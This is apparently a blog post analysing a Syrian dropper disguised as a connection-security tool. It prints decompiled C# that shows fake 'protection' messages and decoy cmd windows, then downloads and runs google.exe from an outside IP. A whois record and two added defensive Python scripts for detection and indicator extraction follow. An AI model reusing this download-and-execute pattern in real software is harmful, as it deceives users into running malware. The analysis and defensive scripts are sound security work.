Howdy all!
Today we’re going to go through some malware straight out of the armpit of the world – Syria. There are of course hurdles to this – namely language barriers. A lot of the code I run into has Arabic characters, but the code is functionally the same. As you may (or may not) know, there is a military conflict going on right now in Syria and they’re using cyber warfare. State-sponsored malware has been seen and captured for analysis. We know it’s from Syria because the C&C servers go right back to Assad and government facilities in Syria.
I get my samples from a friend of mine, Zach, who runs the site syrianmalware.com.
Today we’re going to look at a couple of examples. The first was fairly easy to pull apart. In fact, most of the crap out of Syria has been really easy to pull apart.
You know you’re dealing with pros when the malware looks like this:
Awesome. There was no obfuscation done on this one either. As far as obfuscation goes, I’ve had pretty good luck so far as they only seem to be utilizing reflection:
Now then, let’s have a look see at this malware.
// EncryptYourConection.Form1
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Button1_Click(object sender, EventArgs e)
{
    int num2;
    int num3;
    try
    {
        IL_00:
        int num = 1;
        Interaction.MsgBox("Please Wait while Check Your PC", MsgBoxStyle.OkOnly, null);
        IL_0F:
        ProjectData.ClearProjectError();
        num2 = 1;
        IL_16:
        num = 3;
        Interaction.Shell("cmd.exe /ctree c:\\windows", AppWinStyle.NormalFocus, false, -1);
        IL_26:
        num = 4;
        Interaction.Shell("cmd.exe /ctree d:", AppWinStyle.MaximizedFocus, false, -1);
        IL_36:
        num = 5;
        Interaction.Shell("cmd.exe /ctree E:", AppWinStyle.NormalFocus, false, -1);
        IL_46:
        num = 6;
        Interaction.Shell("cmd.exe /ctree f:", AppWinStyle.NormalFocus, false, -1);
        IL_56:
        num = 7;
        Interaction.Shell("cmd.exe /ctree g:", AppWinStyle.NormalFocus, false, -1);
        IL_66:
        num = 8;
        Interaction.Shell("cmd.exe /ctree h:", AppWinStyle.NormalFocus, false, -1);
        IL_76:
        num = 9;
        Interaction.Shell("cmd.exe /ctree i:", AppWinStyle.NormalFocus, false, -1);
        IL_87:
        num = 10;
        Interaction.Shell("cmd.exe /ctree j:", AppWinStyle.NormalFocus, false, -1);
        IL_98:
        num = 11;
        Interaction.Shell("cmd.exe /ctree k:", AppWinStyle.NormalFocus, false, -1);
        IL_A9:
        num = 12;
        Interaction.Shell("cmd.exe /ctree l:", AppWinStyle.NormalFocus, false, -1);
        IL_BA:
        ProjectData.ClearProjectError();
        num2 = 1;
        IL_C1:
        num = 14;
        if (FileSystem.FileLen(Interaction.Environ("temp") + "\\google.exe") == 0L)
        {
            goto IL_FD;
        }
        IL_E1:
        num = 15;
        FileSystem.Kill(Interaction.Environ("temp") + "\\google.exe");
        IL_FD:
        num = 17;
        MyProject.Computer.Network.DownloadFile("http://216.6.0.28/google.exe", Interaction.Environ("temp") + "\\google.exe");
        IL_128:
        num = 18;
        Interaction.Shell(Interaction.Environ("temp") + "\\google.exe", AppWinStyle.MinimizedFocus, false, -1);
        IL_148:
        num = 19;
        this.ProgressBar1.Value = 50;
        IL_158:
        num = 20;
        Thread.Sleep(10000);
        IL_165:
        num = 21;
        this.Timer1.Enabled = true;
        IL_174:
        num = 22;
        Interaction.MsgBox("You PC is Protect now thank for using our Product", MsgBoxStyle.OkOnly, null);
        IL_184:
        num = 23;
        this.Button1.Enabled = false;
        IL_193:
        num = 24;
        this.Button2.Enabled = true;
        IL_1A2:
        goto IL_258;
        IL_1A7:
        int arg_1AC_0 = num3 + 1;
        num3 = 0;
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_1AC_0);
        IL_219:
        goto IL_24D;
        num3 = num;
        @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num2);
        IL_22B:
        goto IL_24D;
    }
    object arg_22D_0;
    endfilter(arg_22D_0 is Exception & num2 > 0 & num3 == 0);
    IL_24D:
    throw ProjectData.CreateProjectError(-2146828237);
    IL_258:
    if (num3 != 0)
    {
        ProjectData.ClearProjectError();
    }
}
I rather liked this bit:
// EncryptYourConection.Form1
private void Button2_Click(object sender, EventArgs e)
{
    this.ProgressBar1.Value = 0;
    Interaction.MsgBox("You Are Running On unprotected Conection You Maybe At Risk !!!!", MsgBoxStyle.OkOnly, null);
    this.Button1.Enabled = true;
    this.Button2.Enabled = false;
}
Breakdown – Run the program and a shitty looking form appears. A command prompt window appears when you attempt to “secure” your system that just runs the ‘tree’ command. After that, the program attempts to download and run the file “http://216.6.0.28/google.exe”. The site just spins its wheels when I attempt to pull down the file, but inspecting the IP, we get the following info:
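The sequence in that breakdown (a decoy cmd.exe window, an executable written into %temp%, then that executable launched by the same process) is exactly what a host-based detection should key on. The script below is an added example, not code from this post or from the sample: it runs the correlation over constructed Sysmon-style events (Event ID 1 for process creation, Event ID 11 for file creation) with simplified field names; the pids, user name and paths are made up for the example.

```python
"""Behavioural detection for the dropper pattern described in the breakdown:
a process spawns cmd.exe for a display-only command, writes an executable
under a Temp directory and then launches it. Added example; the events are
constructed Sysmon-style records, not real telemetry, and the field names
(id, pid, ppid, image, cmdline, target) are a simplification."""
import re
from collections import defaultdict

# Constructed sample telemetry in time order. Event ID 1 = process create,
# Event ID 11 = file create. The last two records are benign noise.
EVENTS = [
    {"id": 1, "pid": 400, "ppid": 300,
     "image": r"C:\Users\bob\Desktop\EncryptYourConection.exe",
     "cmdline": r"C:\Users\bob\Desktop\EncryptYourConection.exe"},
    {"id": 1, "pid": 401, "ppid": 400,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /ctree c:\windows"},
    {"id": 11, "pid": 400,
     "target": r"C:\Users\bob\AppData\Local\Temp\google.exe"},
    {"id": 1, "pid": 402, "ppid": 400,
     "image": r"C:\Users\bob\AppData\Local\Temp\google.exe",
     "cmdline": r"C:\Users\bob\AppData\Local\Temp\google.exe"},
    # An admin running tree by hand from an interactive shell (pid 200).
    {"id": 1, "pid": 500, "ppid": 200,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c tree d:"},
    # An installer writing a non-executable into Temp.
    {"id": 11, "pid": 600,
     "target": r"C:\Users\bob\AppData\Local\Temp\setup.log"},
]

# Per-user and system Temp directories.
TEMP_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# The cosmetic command the sample runs; "/ctree" and "/c tree" both match.
DECOY_CMD_RE = re.compile(r"^cmd(\.exe)?\s+/c\s*tree\b", re.IGNORECASE)


def detect_temp_droppers(events):
    """Return one alert per executable that was created under Temp and later
    started as a child of the process that wrote it. Events must be in time
    order. The decoy cmd.exe is recorded as supporting context, not as an
    alert on its own, because users legitimately run tree."""
    written = defaultdict(set)   # writer pid -> lowercased .exe paths it created
    decoy_parents = set()        # pids that spawned "cmd.exe /c tree"
    alerts = []
    for ev in events:
        if ev["id"] == 11:
            path = ev["target"]
            if TEMP_RE.search(path) and path.lower().endswith(".exe"):
                written[ev["pid"]].add(path.lower())
        elif ev["id"] == 1:
            if DECOY_CMD_RE.match(ev["cmdline"]):
                decoy_parents.add(ev["ppid"])
            # Payload launched by the very process that dropped it.
            if ev["image"].lower() in written.get(ev["ppid"], ()):
                alerts.append({
                    "dropper_pid": ev["ppid"],
                    "payload": ev["image"],
                    "payload_pid": ev["pid"],
                    "decoy_cmd_seen": ev["ppid"] in decoy_parents,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_temp_droppers(EVENTS):
        print(alert)
```

Keying on "wrote an .exe into Temp, then ran it" rather than on the cmd.exe window keeps the rule quiet on the benign records while still flagging the sample's dropper, and the decoy flag gives an analyst the extra context without turning every tree invocation into an alert.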
# http://whois.arin.net/rest/nets;handle=NET-216-6-0-0-2?showDetails=true&showARIN=false&ext=netref2
#
NetRange:       216.6.0.0 - 216.6.1.255
CIDR:           216.6.0.0/23
OriginAS:
NetName:        SYRIAN-5
NetHandle:      NET-216-6-0-0-2
Parent:         NET-216-6-0-0-1
NetType:        Reassigned
Comment:        Fax-no-963 11 3739765
RegDate:        2005-07-22
Updated:        2005-07-22
Ref:            http://whois.arin.net/rest/net/NET-216-6-0-0-2

OrgName:        STE (Syrian Telecommunications Establishment)
OrgId:          SSTE
Address:        Fayz Mansour St
Address:        STE Building
City:           Damascus
StateProv:
PostalCode:
Country:        SY
RegDate:        2005-07-22
Updated:        2011-09-24
Ref:            http://whois.arin.net/rest/org/SSTE

OrgTechHandle:  SAL55-ARIN
OrgTechName:    AL NASHEF, Samer
OrgTechPhone:   +963 11 3739766
OrgTechEmail:   sytld-admin@net.sy
OrgTechRef:     http://whois.arin.net/rest/poc/SAL55-ARIN

OrgAbuseHandle: SAL55-ARIN
OrgAbuseName:   AL NASHEF, Samer
OrgAbusePhone:  +963 11 3739766
OrgAbuseEmail:  sytld-admin@net.sy
OrgAbuseRef:    http://whois.arin.net/rest/poc/SAL55-ARIN

RTechHandle:    SAL55-ARIN
RTechName:      AL NASHEF, Samer
RTechPhone:     +963 11 3739766
RTechEmail:     sytld-admin@net.sy
RTechRef:       http://whois.arin.net/rest/poc/SAL55-ARIN
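Also added here, and not the author's tooling: a small triage script that pulls the indicators out of the decompiled listing above (the shell command lines, the download URL and where the file lands) and then checks the download host against the CIDR in the ARIN record, so the attribution step is a repeatable check rather than eyeballing a whois dump. The decompiled excerpt and the abridged whois text are copied from this post; everything else, including rendering Interaction.Environ("temp") as %temp%, is this example's own convention.

```python
"""Triage helpers for the dropper above: extract indicators from decompiled
.NET source and confirm the download host lies in the netblock the ARIN
record describes. Added example, not the post author's code; the decompiled
and whois excerpts are copied from the post."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Excerpt of the decompiled Button1_Click listing (raw string, so the C#
# escape sequences survive exactly as the decompiler printed them).
DECOMPILED = r'''
Interaction.Shell("cmd.exe /ctree c:\\windows", AppWinStyle.NormalFocus, false, -1);
Interaction.Shell("cmd.exe /ctree d:", AppWinStyle.MaximizedFocus, false, -1);
FileSystem.Kill(Interaction.Environ("temp") + "\\google.exe");
MyProject.Computer.Network.DownloadFile("http://216.6.0.28/google.exe", Interaction.Environ("temp") + "\\google.exe");
Interaction.Shell(Interaction.Environ("temp") + "\\google.exe", AppWinStyle.MinimizedFocus, false, -1);
'''

# Abridged copy of the ARIN record quoted above, one field per line.
WHOIS = """\
# http://whois.arin.net/rest/nets;handle=NET-216-6-0-0-2?showDetails=true&showARIN=false&ext=netref2
NetRange:       216.6.0.0 - 216.6.1.255
CIDR:           216.6.0.0/23
NetName:        SYRIAN-5
RegDate:        2005-07-22
OrgName:        STE (Syrian Telecommunications Establishment)
OrgId:          SSTE
Address:        Fayz Mansour St
Address:        STE Building
City:           Damascus
StateProv:
Country:        SY
RegDate:        2005-07-22
"""

ENVIRON_RE = re.compile(r'Interaction\.Environ\("(\w+)"\)')
CS_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SHELL_RE = re.compile(r'Interaction\.Shell\((.*?),\s*AppWinStyle')
DOWNLOAD_RE = re.compile(r'DownloadFile\((.*?),\s*(.*?)\);')
ENV_PATH_RE = re.compile(r'Interaction\.Environ\("\w+"\)\s*\+\s*"(?:[^"\\]|\\.)*"')


def render_expr(expr):
    """Turn a concatenation of C# string literals and Interaction.Environ()
    calls into the value the program builds at run time. Environ("temp")
    is shown as %temp% (this example's convention); the quoted pieces are
    unescaped and joined in order."""
    expr = ENVIRON_RE.sub(lambda m: f'"%{m.group(1)}%"', expr)
    pieces = CS_STRING_RE.findall(expr)
    return "".join(p.encode("latin-1").decode("unicode_escape") for p in pieces)


def extract_iocs(src):
    """Shell command lines, (url, destination) download pairs, and every
    path built under an environment directory."""
    shell = [render_expr(m.group(1)) for m in SHELL_RE.finditer(src)]
    downloads = [(render_expr(u), render_expr(d)) for u, d in DOWNLOAD_RE.findall(src)]
    dropped = sorted({render_expr(m.group(0)) for m in ENV_PATH_RE.finditer(src)})
    return {"shell_commands": shell, "downloads": downloads, "dropped_files": dropped}


def parse_whois(text):
    """Key: value lines into a dict of lists; ARIN repeats keys such as
    Address and RegDate, and leaves some values empty."""
    fields = defaultdict(list)
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        fields[key.strip()].append(value.strip())
    return dict(fields)


def host_in_netblock(url, fields):
    """True when the URL's host address falls inside a CIDR in the record."""
    host = ipaddress.ip_address(urlparse(url).hostname)
    return any(host in ipaddress.ip_network(c, strict=False) for c in fields.get("CIDR", []))


def attribution_summary(url, fields):
    owner = fields.get("OrgName", ["?"])[0]
    country = fields.get("Country", ["?"])[0]
    where = "inside" if host_in_netblock(url, fields) else "outside"
    return f"{urlparse(url).hostname} is {where} {fields['CIDR'][0]} ({owner}, {country})"


if __name__ == "__main__":
    iocs = extract_iocs(DECOMPILED)
    for cmd in iocs["shell_commands"]:
        print("shell:", cmd)
    for url, dest in iocs["downloads"]:
        print("download:", url, "->", dest)
        print(attribution_summary(url, parse_whois(WHOIS)))
```

Working from the decompiled text rather than from raw strings in the binary matters for .NET samples like this one: the destination path only exists as a concatenation at run time, so a plain strings dump shows "\google.exe" with no hint of the directory.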
GEE, I WONDER WHO COULD BE BEHIND THIS?
Stay tuned for part 2 when I go over the other 2 pieces. For now though, it’s late and I need my beauty rest.